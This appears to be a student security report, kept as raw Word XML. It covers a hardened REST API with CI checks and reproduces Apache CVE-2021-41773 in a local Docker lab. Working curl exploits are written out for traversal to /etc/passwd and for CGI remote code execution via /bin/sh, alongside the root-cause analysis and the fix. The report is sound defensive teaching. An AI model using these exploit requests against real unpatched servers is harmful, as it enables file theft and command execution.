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____ / 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https://github.com/&lt;user&gt;/work1-secure-api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https://github.com/&lt;user&gt;/work1-secure-api/actions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goal of the work is to walk the full security lifecycle of a small backend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service: design it against the OWASP Top 10, automate the security checks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CI/CD, then take a real, publicly documented vulnerability, reproduce it in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isolated environment, explain its root cause, fix it and prove that the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works without breaking the application.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Two deliverables are produced: a working, hardened REST API with a green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pipeline, and a reproducible analysis of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>CVE-2021-41773</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Apache HTTP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2.4.49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running scripts/live_demo.ps1 – steps 1, 3, 4 visible]]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All database access goes through parameterised statements. The query text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*and*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against both the login and the search endpoint: all are refused or return zero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API answers with JSON, which is *not* automatically XSS-safe — clients put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JSON into the DOM. Therefore every string is HTML-escaped on the way out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12. Two users with the same password get different hashes; a stolen database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be turned into passwords cheaply. SHA-256 would be useless here: it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>, and then</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pP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wrong password.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>,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Local run of the same three commands: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GitHub Actions – all three jobs green]]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sast job log – "No issues identified"]]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sca job log – "No known vulnerabilities found"]]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</w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4677"/>
          </w:tcPr>
          <w:p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CVE-2021-41773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Apache HTTP Server 2.4.49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CWE-22 – path traversal; CWE-20 – improper input validation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7.5 HIGH (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>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5 October 2021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>2.4.51 (2.4.50 was an incomplete fix)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4677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r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">NVD, Apache HTTP Server security page, Vulhub </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>httpd/CVE-2021-41773</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Apache 2.4.49 introduced a rewritten request-path normaliser. A crafted URL can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therefore make the server map a request to a file </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>outside</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> the document root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and return it. If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is permissive, arbitrary files are disclosed;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if CGI is enabled, the same traversal reaches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and the request body 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executed as a shell script — remote code execution.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Vulhub environment for this CVE ships exactly that configuration: 2.4.49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with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enabled and </w:t>
      </w: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relaxed to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--build -d</w:t>
        <w:br/>
        <w:t>$ curl -s http://127.0.0.1:8080/</w:t>
        <w:br/>
        <w:t>It works!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File disclosure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--path-as-is \</w:t>
        <w:br/>
        <w:t xml:space="preserve">    'http://127.0.0.1:8080/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'</w:t>
        <w:br/>
        <w:t>&lt; HTTP/1.1 200 OK</w:t>
        <w:br/>
        <w:t>...</w:t>
        <w:br/>
        <w:t>root:x:0:0:root:/root:/bin/bash</w:t>
        <w:br/>
        <w:t>daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin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--path-as-is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is essential: otherwise curl normalises </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>.%2e/…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client and the request never reaches the vulnerable code path.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Remote code execution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-v --data 'echo;id' \</w:t>
        <w:br/>
        <w:t xml:space="preserve">    'http://127.0.0.1:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh'</w:t>
        <w:br/>
        <w:t>&lt; HTTP/1.1 200 OK</w:t>
        <w:br/>
        <w:t>...</w:t>
        <w:br/>
        <w:t>uid=1(daemon) gid=1(daemon) groups=1(daemon)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echo;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> terminates the CGI response headers so that </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> output is visible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body.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traversal returning root:x:0:0]]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terminal – curl CGI returning uid=1(daemon)]]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Apache 2.4.49 removed the old </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>ap_getparents()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>ap_no2slash()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> helpers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replaced them with a single </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>ap_normalize_path()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> used by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>. The new function walks the URL segment by segment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refuses to let the path climb above the request root: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if (!seg_start || strcmp(seg_start, "..") == 0) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    if (path == path_start) return 0;   /* would leave the root */</w:t>
        <w:br/>
        <w:t xml:space="preserve">    path--;                             /* drop the previous segment */</w:t>
        <w:br/>
        <w:t>}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The error is one of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>ordering</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>: the comparison is made against the *still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percent-encoded* segment, while decoding happens later in the same pass.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Take the segment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>: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strcmp(".%2e", "..") != 0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>, so the "cannot go above the root" branch is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taken and the segment looks like an ordinary file name.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The decoder then turns </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>%2e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> into </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, so the segment becomes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Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>ap_core_translate()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> joins the result to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>DocumentRoot</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and the filesystem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resolves the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 xml:space="preserve"> — the path escapes the web root.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This is why the exploit uses the odd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spelling: a plain </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>../</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is caught by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check; the encoded variant is not. The defect is a validate-before-normalise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logic error, not a missing check.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configuration makes the impact worse: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&lt;Directory /&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> was set to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Require all granted</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>, so paths outside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document root are authorised at all;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pP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loaded, so the traversed </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/bin/sh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is *executed*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instead of merely disclosed.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docker-compose/Dockerfile showing 2.4.49 + Require all granted + CGI]]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Three independent layers (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Patch the software</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — base image </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>httpd:2.4.51</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>. The corrected normaliser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decodes first and validates afterwards, so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can no longer hide a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>..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2.4.51 rather than 2.4.50, because 2.4.50 still allowed a variant bypass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%%32%65</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman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Restore default-deny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&lt;Directory /&gt; Require all denied</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>, with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explicit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>&lt;Directory "/usr/local/apache2/htdocs"&gt; Require all granted</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>. Even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future traversal bug can no longer read </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/etc/passwd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman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Reduce the attack surface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mod_cgi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mod_cgid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are not loaded. A static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file service has nothing to execute, so file disclosure cannot become RCE.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FROM httpd:2.4.51</w:t>
        <w:br/>
        <w:t>RUN sed -i 's|^LoadModule cgi_module|#LoadModule cgi_module|'  /usr/local/apache2/conf/httpd.conf ; \</w:t>
        <w:br/>
        <w:t xml:space="preserve">    sed -i 's|^LoadModule cgid_module|#LoadModule cgid_module|' /usr/local/apache2/conf/httpd.conf</w:t>
        <w:br/>
        <w:t>COPY hardening.conf /usr/local/apache2/conf/extra/hardening.conf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Why this is effective: layer 1 removes the vulnerable code path; layers 2 and 3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are not redundant "belt and braces" but separate trust boundaries —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authorisation layer protects against *any* path-normalisation bug, and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attack-surface layer protects against *any* file-disclosure bug being escalated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to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Same commands, rebuilt environment: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br/>
        <w:t>$ curl --path-as-is -i 'http://127.0.0.1:8080/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'</w:t>
        <w:br/>
        <w:t>HTTP/1.1 403 Forbidden</w:t>
        <w:br/>
        <w:t># body contains no root:x:0:0</w:t>
        <w:br/>
        <w:br/>
        <w:t>$ curl --path-as-is -i --data 'echo;id' 'http://127.0.0.1:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh'</w:t>
        <w:br/>
        <w:t>HTTP/1.1 403 Forbidden</w:t>
        <w:br/>
        <w:t># body contains no uid=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Regression test — the service must still work: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http://127.0.0.1:8080/</w:t>
        <w:br/>
        <w:t>HTTP/1.1 200 OK</w:t>
        <w:br/>
        <w:t>It works!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VERDICT: file disclosure = SUCCESS (vulnerable as expected)</w:t>
        <w:br/>
        <w:t>VERDICT: command execution = SUCCESS (vulnerable as expected)</w:t>
        <w:br/>
        <w:t>Result: PASS - vulnerability reproduced</w:t>
        <w:br/>
        <w:br/>
        <w:t>VERDICT: traversal blocked = True</w:t>
        <w:br/>
        <w:t>VERDICT: RCE blocked = True</w:t>
        <w:br/>
        <w:t>VERDICT: normal functionality intact = True</w:t>
        <w:br/>
        <w:t>Result: PASS - vulnerability eliminated</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>[[SCREENSHOT: fixed environment – both attacks return 403, / still 200]]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work produced (a) a working API whose security properties are enforced in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code *and* pinned by tests, (b) a CI pipeline that fails on a medium SAST finding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or a vulnerable dependency, and (c) a reproducible exploitation-and-fix cycle for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 real CVE.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most transferable lesson is from part (c): a vulnerability does not have to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be a missing check. In CVE-2021-41773 the check existed and was correct —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just ran on a different representation of the string than the one that was later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used. Input must be normalised *before* it is validated, never after,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defence in depth (default-deny + minimal attack surface) is what keeps one such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mistake from becoming remote code execution.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 try billions of candidates per second. bcrypt is deliberately slow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tunable (cost 12 ≈ 2^12 rounds), and it stores a per-password salt inside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hash, so identical passwords produce different hashes and precomputed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rainbow tables do not apply.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every branch, including unreachable code, but produces false positives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cannot see configuration or runtime state. DAST attacks a running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application from outside — it finds real, reachable issues but only covers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what it can reach and gives less precise localisation.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verifies the signature with a shared secret (HS256) or public key (RS256) and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checks the time-based and issuer claims. The payload is signed, not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encrypted — anyone can read it, so no secrets belong in it.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privileges. An unpatched library with a known CVE (Log4Shell,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event-stream incident) gives an attacker code execution or data access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without ever touching your own source. SCA is the only control that catches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this, because SAST looks at *your* code.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disposable, isolated and reproducible: no host pollution, no leftover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version is pinned in a file that can be shared with the whole class.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ap_normalize_path</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> accepts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because it validates before decoding). An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exploit is the concrete sequence of requests that abuses it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curl --path-as-is /icons/.%2e/…/etc/passwd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>). In this work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vulnerability is in Apache's normaliser; the exploit is the curl request.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security fix that disables the feature is not a fix. Here, a perfectly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"secure" answer would be to block the whole service; the regression check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(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>GET /</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> still returns 200) proves the legitimate path still works.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="40"/>
      </w:pP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working exploit looks like in order to judge whether a target is really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affected, and a SOC analyst needs the same knowledge to recognise the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traffic in logs. Reproduction turns a CVE description into a concrete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 xml:space="preserve">signature: the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>.%2e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> pattern in a URL is trivial to grep for once you have</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>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